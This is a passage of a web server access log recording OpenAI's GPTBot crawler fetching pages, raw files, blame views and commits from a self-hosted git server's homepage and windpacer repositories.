"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44636] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27246] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11673] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11684] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11678] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9500] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9500] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27214] [Gzip 11.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13871] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" +[17/Feb/2026:13:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10871] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/actions" [Client 74.7.227.38] [Length 7414] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/actions" [Client 74.7.227.38] [Length 7411] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" +[17/Feb/2026:13:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13654] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" +[17/Feb/2026:13:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" +[17/Feb/2026:13:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" +[17/Feb/2026:13:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 9503] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10839] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" [Client 74.7.227.38] [Length 10895] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" [Client 74.7.227.38] [Length 10924] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 74.7.227.38] [Length 9835] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:13:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:13:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch" [Client 74.7.227.38] [Length 185638465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2.diff" [Client 74.7.227.38] [Length 6160] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:13:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" +[17/Feb/2026:13:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13879] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10726] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" +[17/Feb/2026:13:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13650] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" +[17/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" +[17/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" +[17/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10277] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13655] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" +[17/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" +[17/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" +[17/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10108] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] 